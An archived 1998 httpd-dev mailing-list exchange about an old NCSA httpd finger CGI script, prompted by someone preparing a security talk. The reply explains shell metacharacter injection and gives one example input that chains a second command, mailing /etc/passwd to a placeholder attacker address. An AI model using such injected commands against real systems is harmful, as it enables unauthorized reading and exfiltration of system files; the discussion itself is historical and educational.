httpd-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Josh Rotenberg <>
Subject Re: Seeking information about old NCSA httpd `finger' bug
Date Mon, 22 Jun 1998 17:43:00 GMT
i dont have the script in front of me, and i dont know of a particular
'incident', but im guessing the script doesnt escape characters in the command
it creates, i.e. you type in a query to finger, and the script simply takes it
and executes in a shell 'finger whatever@wherever' without checking for, say,
a ';', which would allow you to execute a second command, so if i were to type
'; mail haxor@domain< /etc/passwd'

i would end up getting the /etc/passwd file of the machine.

i assume this os what you are looking for ... sorry if im explaining stuff you
already know and were looking for something else.


Said Mark-Jason Dominus <> on Mon, Jun 22, 1998 at 09:51:27AM -0400:
> Back around 1995 or so there was a problem with a sample application
> distributed with NCSA httpd.  The application was a shell script that
> was supposed to deliver the `finger' service on the web.  
> The problem was pretty typical; I think if you put some sort of shell
> metacharacter into the query string, you could get the program to
> execute arbitrary commands.  But I don't remember it exactly.  
> I am going to be giving a talk about security and the WWW, and I
> wanted to discuss this episode.  I've been over the CERT archives and
> I can't find any information about it, and I've even dug up the old
> source code and found the script, but I can't figure out how to
> exercise the bug.
> Is there anyone who remembers this and can remind me of the details?

	josh rotenberg - -		
			     // whatever

View raw message